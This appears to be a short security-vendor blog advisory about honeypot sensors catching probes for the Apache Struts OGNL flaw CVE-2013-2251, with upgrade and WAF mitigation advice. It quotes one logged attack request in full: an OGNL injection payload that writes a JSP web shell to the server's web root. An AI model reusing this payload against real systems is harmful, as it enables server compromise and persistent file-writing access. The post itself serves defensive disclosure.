Trustwave Government Solutions Attains StateRAMP Authorization. Learn More
Get access to immediate incident response assistance.
Get access to immediate incident response assistance.
Trustwave Government Solutions Attains StateRAMP Authorization. Learn More
Today our web honeypot sensors picked up probes for the recent Apache Struts 2.X OGNL vulnerability (CVE-2013-2251):
222.136.0.151 - - [16/Aug/2013:09:25:21 +0200] "GET /index.action?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23p%3d(%23req.getRealPath(%22/%22)%2b%22inback.jsp%22).replaceAll(\"\\\\\\\\\",%20\"/\"),new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e HTTP/1.1" 404 291 "-" "Sturt2"
Struts users are strongly encouraged to upgrade to v2.3.15.1.
If you are not able to upgrade, you can also use ModSecurity WAF and our commercial SpiderLabs ModSecurity rules as we have added protections to mitigate this issue.
Trustwave is a globally recognized cybersecurity leader that reduces cyber risk and fortifies organizations against disruptive and damaging cyber threats. Our comprehensive offensive and defensive cybersecurity portfolio detects what others cannot, responds with greater speed and effectiveness, optimizes client investment, and improves security resilience. Learn more about us.
Copyright © {{year}} Trustwave Holdings, Inc. All rights reserved.
', 'form_field': {'form_id': '68741a11-8e56-4f23-ba7f-b2307e77714c', 'form_type': 'HUBSPOT', 'message': 'Thank you for your email! You will soon receive the Trustwave newsletter
', 'response_type': 'inline', 'gotowebinar_webinar_key': null} , 'form_title': 'Sign up to receive the latest security news and trends straight to your inbox from Trustwave.', 'menu_items': [{'footer_menu': [{'children': [], 'isPublished': false, 'linkLabel': 'Leadership Team', 'linkUrl': 'https://www.trustwave.com/en-us/company/about-us/leadership/', 'type': 'URL_LINK', 'url': 'https://www.trustwave.com/en-us/company/about-us/leadership/'} , {'children': [], 'isPublished': false, 'linkLabel': 'Our History', 'linkUrl': 'https://www.trustwave.com/en-us/company/about-us/our-history/', 'type': 'URL_LINK', 'url': 'https://www.trustwave.com/en-us/company/about-us/our-history/'} , {'children': [], 'isPublished': false, 'linkLabel': 'News Releases', 'linkUrl': 'https://www.trustwave.com/en-us/company/newsroom/news/', 'type': 'URL_LINK', 'url': 'https://www.trustwave.com/en-us/company/newsroom/news/'} , {'children': [], 'isPublished': false, 'linkLabel': 'Media Coverage', 'linkUrl': 'https://www.trustwave.com/en-us/company/newsroom/media/', 'type': 'URL_LINK', 'url': 'https://www.trustwave.com/en-us/company/newsroom/media/'} ]} , {'footer_menu': [{'children': [], 'isPublished': false, 'linkLabel': 'Careers', 'linkUrl': 'https://www.trustwave.com/en-us/company/careers/', 'type': 'URL_LINK', 'url': 'https://www.trustwave.com/en-us/company/careers/'} , {'children': [], 'isPublished': false, 'linkLabel': 'Global Locations', 'linkUrl': 'https://www.trustwave.com/en-us/company/global-locations/', 'type': 'URL_LINK', 'url': 'https://www.trustwave.com/en-us/company/global-locations/'} , {'children': [], 'isPublished': false, 'linkLabel': 'Awards & Accolades', 'linkUrl': 'https://www.trustwave.com/en-us/company/about-us/accolades/', 'type': 'URL_LINK', 'url': 'https://www.trustwave.com/en-us/company/about-us/accolades/'} , {'children': [], 'isPublished': false, 'linkLabel': 'Trials & Evaluations', 'linkUrl': 'https://www.trustwave.com/en-us/resources/security-resources/special-offers/', 'type': 'URL_LINK', 'url': 'https://www.trustwave.com/en-us/resources/security-resources/special-offers/'} ]} , {'footer_menu': [{'children': [], 'isPublished': false, 'linkLabel': 'Contact', 'linkUrl': 'https://www.trustwave.com/en-us/company/contact/', 'type': 'URL_LINK', 'url': 'https://www.trustwave.com/en-us/company/contact/'} , {'children': [], 'isPublished': false, 'linkLabel': 'Support', 'linkUrl': 'https://www.trustwave.com/en-us/company/support/', 'type': 'URL_LINK', 'url': 'https://www.trustwave.com/en-us/company/support/'} , {'children': [], 'isPublished': false, 'linkLabel': 'Security Advisories', 'linkUrl': 'https://www.trustwave.com/en-us/resources/security-resources/security-advisories/', 'type': 'URL_LINK', 'url': 'https://www.trustwave.com/en-us/resources/security-resources/security-advisories/'} , {'children': [], 'isPublished': false, 'linkLabel': 'Software Updates', 'linkUrl': 'https://www.trustwave.com/en-us/resources/security-resources/software-updates/', 'type': 'URL_LINK', 'url': 'https://www.trustwave.com/en-us/resources/security-resources/software-updates/'} ]} ], 'social_group': [{'social_icon': '', 'social_link': {'url': {'type': 'EXTERNAL', 'content_id': null, 'href': 'https://www.linkedin.com/company/trustwave', 'href_with_scheme': 'https://www.linkedin.com/company/trustwave'} , 'open_in_new_tab': true, 'no_follow': false, 'sponsored': false, 'user_generated_content': false, 'rel': 'noopener'} } , {'social_icon': '', 'social_link': {'url': {'type': 'EXTERNAL', 'content_id': null, 'href': 'https://twitter.com/Trustwave', 'href_with_scheme': 'https://twitter.com/Trustwave'} , 'open_in_new_tab': true, 'no_follow': false, 'sponsored': false, 'user_generated_content': false, 'rel': 'noopener'} } , {'social_icon': '', 'social_link': {'url': {'type': 'EXTERNAL', 'content_id': null, 'href': 'https://www.youtube.com/channel/UC2CCqdrAxD9-Fv83NOdjhqA', 'href_with_scheme': 'https://www.youtube.com/channel/UC2CCqdrAxD9-Fv83NOdjhqA'} , 'open_in_new_tab': true, 'no_follow': false, 'sponsored': false, 'user_generated_content': false, 'rel': 'noopener'} } ], 'title': 'Stay Informed', 'top_button_icon': ''} , 'mobile_popup_forms': {'mobile_global_popup_form': {'form_id': '0ba582d8-a14e-4ce6-9ec3-def133446115', 'response_type': 'inline', 'message': '
Thank You
One of our sales specialists will be in touch with you shortly.
Browse our latest blogs or visit our Resource Library.
', 'gotowebinar_webinar_key': null, 'form_type': 'HUBSPOT'} , 'mobile_contact_popup_form': {'form_id': '361db4f3-34d0-484c-9d02-f28084e99b92', 'response_type': 'inline', 'message': '
Thank You
One of our security experts will be in touch with you shortly.
Browse our latest blogs or visit our Resource Library.
', 'gotowebinar_webinar_key': null, 'form_type': 'HUBSPOT'} } } ) %}{% set html_wrapper_id = 'hs_cos_wrapper_module_169103980660822' %}
Copyright © 2024 Trustwave Holdings, Inc. All rights reserved.